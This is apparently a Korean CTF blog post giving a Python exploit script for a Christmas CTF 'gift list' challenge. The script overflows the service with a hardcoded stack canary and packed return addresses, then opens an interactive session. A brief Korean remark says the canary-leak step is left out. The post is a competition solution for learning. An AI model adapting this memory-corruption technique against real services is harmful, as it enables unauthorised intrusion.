#!/usr/bin/python
from socket import *
from struct import pack,unpack
import time
import telnetlib
host = "prob2.christmasctf.com"
port = 11111
canary = "\xab\x7e\x41" # server
unp = lambda x:unpack("<L",x)[0]
def recv_until(s,param):
data = ""
while param not in data:
data += s.recv(1)
return data
def InsertGiftList(s,name,num):
s.send("1\n")
recv_until(s,"Name? >>> ")
s.send(name)
recv_until(s,"Gift? >>> ")
s.send(num + "\n")
def RemoveGiftList(s,name,num):
s.send("2\n")
recv_until(s,"Name? >>> ")
s.send(name)
recv_until(s,"Gift? >>> ")
s.send(num + "\n")
recv_until(s,"Removed : ")
time.sleep(0.5)
return s.recv(24)
s = create_connection((host,port))
recv_until(s,"---> ")
InsertGiftList(s,"0"*16,"-1")
InsertGiftList(s,"1" + canary + "aaaabbbbcccc","134514992")
InsertGiftList(s,"\xee\x94\x04\x08\xd2\x95\x04\x08\xa4\xb0\x04\x08\xee\x94\x04\x08","-1")
InsertGiftList(s,"\xf0\xff\xff\xff\x93\x8a\x04\x08eeee\xa4\xb0\x04\x08","-1")
data = RemoveGiftList(s,"0"*16,"-1")
time.sleep(0.1)
s.send("1734437990\n")
tn = telnetlib.Telnet(host,port)
tn.sock = s
tn.interact()
stack canary를 얻어오는 과정이 생략되어있음. 바이너리 안에 파일을 읽고 그 내용을 출력하는 아주 기특한 함수가 있는데 그 함수를 이용했던 것으로 기억함.
'CTF' 카테고리의 다른 글
| [Layer7 2015] Reverse Me, Easy Rerversing (0) | 2015.09.01 |
|---|---|
| Codegate 2015 bookstore (0) | 2015.03.17 |
| Codegate 2014 minibomb write-up (5) | 2014.03.09 |
| Codegate 2014 angrydoraemon write-up (0) | 2014.03.09 |
| Codegate Junior 2014 Write-up (0) | 2014.03.05 |
